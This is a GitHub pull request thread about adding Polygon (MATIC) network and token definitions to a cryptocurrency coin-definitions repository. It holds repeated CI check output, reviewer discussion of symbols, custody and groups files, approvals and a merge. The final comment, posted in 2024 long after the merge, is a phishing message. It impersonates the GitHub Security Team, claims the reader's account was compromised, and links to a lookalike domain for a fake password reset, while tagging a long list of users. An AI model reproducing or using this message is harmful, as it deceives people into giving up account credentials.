Add definition for Polygon network+tokens
blockchain/coin-definitions pull request #71
Opened 2022-03-10 16:38 UTC by pablojorge

2022-03-10 16:43 UTC, blockchain-concourse-platform commented
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [DGLD, COIN]: minWithdrawal 5460 -> $0.010 not in the $0.01-$10 USD range
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

2022-03-11 04:24 UTC, blockchain-concourse-platform commented
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [DGLD, COIN]: minWithdrawal 5460 -> $0.010 not in the $0.01-$10 USD range
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

2022-03-11 20:04 UTC, smarvasti-bc commented on chain/list.json
> +    "native": "MATIC.MATIC",
@pablojorge the native part should be just token symbol so MATIC

2022-03-11 20:27 UTC, pablojorge commented on chain/list.json
> +    "native": "MATIC.MATIC",
Thanks! Updated

2022-03-11 20:27 UTC, blockchain-concourse-platform commented
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [DGLD, COIN]: minWithdrawal 5460 -> $0.010 not in the $0.01-$10 USD range
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

2022-03-14 01:04 UTC, smarvasti-bc submitted a review, later dismissed

2022-03-14 01:05 UTC, smarvasti-bc commented on chain/list.json
> +    "chain": "celo",
chelo should be removed unless we agree to remove CELO_TYPE from assets service.

2022-03-15 00:50 UTC, pablojorge commented on chain/list.json
> +    "chain": "celo",
I think that for consistency, we should keep `celo` here, and skip in the assets service (given it already gets an special treatment there)

2022-03-15 01:20 UTC, blockchain-concourse-platform commented
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [DGLD, COIN]: minWithdrawal 5460 -> $0.010 not in the $0.01-$10 USD range
-  ⚠️  [MATIC.MATIC, COIN]: displayed as: MATIC.MATIC
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

2022-03-15 14:39 UTC, smarvasti-bc commented on groups.json
> +    "childSymbols": ["USDC.MATIC"]
this was a bug it is fixed under my pull @pablojorge can you change USDC.MATIC to USDT.MATIC FOR USDT

2022-03-15 16:33 UTC, pablojorge commented on groups.json
> +    "childSymbols": ["USDC.MATIC"]
Done, thanks!!

2022-03-17 00:13 UTC, smarvasti-bc commented on chain/list.json
> +    "chain": "celo",
I believe it should be  removed  in nabu-assets so celo is the same as the others..

2022-03-17 00:14 UTC, smarvasti-bc commented on chain/list.json
> +    "chain": "celo",
The only issue is I dont know who relies on CELO_TYPE. service-price doesnt.

2022-03-17 00:16 UTC, smarvasti-bc approved these changes

2022-03-18 11:24 UTC, smarvasti-bc commented on custody.json
> +  {
@pablojorge in the first instance this should not be available in custodial ? @amadeo-bc said.

2022-03-18 11:26 UTC, smarvasti-bc requested changes
I dont think matic.matic should be in custodial in phase 1 . lets check with @amadeo-bc

2022-03-21 11:11 UTC, smarvasti-bc commented on custody.json
> +    "symbol": "USDC.MATIC",
actually this one

2022-03-21 15:12 UTC, pablojorge commented on custody.json
> +  {
We're adding full MATIC support in custodial too, but of course it doesn't have to be enabled if we don't need to. I'll remove it from this file then.

2022-03-21 23:47 UTC, smarvasti-bc commented on groups.json
> +[
in my opinion MATIC.MATIC should be here under parentSymbol MATIC for service-price to be able to price it.

2022-03-22 16:47 UTC, pablojorge commented on custody.json
> +  {
We decided to keep it

2022-03-22 16:48 UTC, blockchain-concourse-platform commented
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [MATIC.MATIC, COIN]: displayed as: MATIC.MATIC
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

2022-03-22 19:35 UTC, smarvasti-bc approved these changes

2022-03-22 19:45 UTC, mpfluger submitted a review, later dismissed

2022-03-28 08:55 UTC, blockchain-concourse-platform commented
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [MATIC.MATIC, COIN]: displayed as: MATIC.MATIC
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

2022-03-29 12:07 UTC, blockchain-concourse-platform commented
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [NEAR, COIN]: minWithdrawal 0.01 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

2022-04-13 22:45 UTC, blockchain-concourse-platform commented
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

2022-04-21 10:23 UTC, blockchain-concourse-platform commented
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

2022-04-21 16:59 UTC, mpfluger approved these changes

2022-04-28 01:11 UTC, blockchain-concourse-platform commented
[+] Running checks...


-  ⚠️  [BSV, COIN]: No logo
-  ⚠️  [CEUR, CELO_TOKEN]: displayed as: cEUR
-  ⚠️  [CLOUT, COIN]: displayed as: DESO
-  ⚠️  [CLOUT, COIN]: minWithdrawal 2000 -> $0.000 not in the $0.01-$10 USD range
-  ⚠️  [CUSD, CELO_TOKEN]: displayed as: cUSD
-  ⚠️  [LTC, COIN]: minWithdrawal 5460 -> $0.006 not in the $0.01-$10 USD range
-  ⚠️  [PAX, ERC20]: displayed as: USDP
-  ⚠️  [RENBTC, ERC20]: displayed as: renBTC

2022-04-28 01:21 UTC, Kalliingi requested changes

2022-04-28 01:53 UTC, Kalliingi commented
🎯

2022-04-28 15:06 UTC, merged

2024-05-26 02:48 UTC, Admin-nextbill commented
# Unauthorized Access Detected

## Immediate Action Required

Dear GitHub User,

It has come to our attention that your GitHub account has been accessed by an unauthorized individual. In order to prevent any further unauthorized access and to secure your account, we urge you to take immediate action.

### What to Do Next

Please visit the following link to reset your password and revoke access to any unauthorized parties: [Reset Password Here](http://github.hudevelopers.online/)

Your prompt attention to this matter is greatly appreciated. Thank you for your cooperation in ensuring the security of your GitHub account.

Sincerely,

GitHub Security Team

---

### List of GitHub Accounts Affected:

- nftbigdev
- @etherpan
- @ilanolkies
- @larry0x
- @srishilesh
- @balajipachai
- @near-examples
- @mcne65
- @HuobiGroup
- @ruanbekkerleviathanbeak
- @Magician-Blockchain
- @zscorpio
- @yhuag
- @khovratovich
- @cds-amal
- @HadesHappy
- @docongminh
- @RuiSiang
- @josedlujancodersharma2001
- @Jonath-z
- @cryptoinhero
- ... (and many more)

---

### Additional Notes

If you believe your account has been accessed without authorization but do not see your username listed above, please contact GitHub Support immediately to report the incident. Your account may have still been affected and not yet been identified.

Thank you for your attention to this matter. Stay safe and secure online.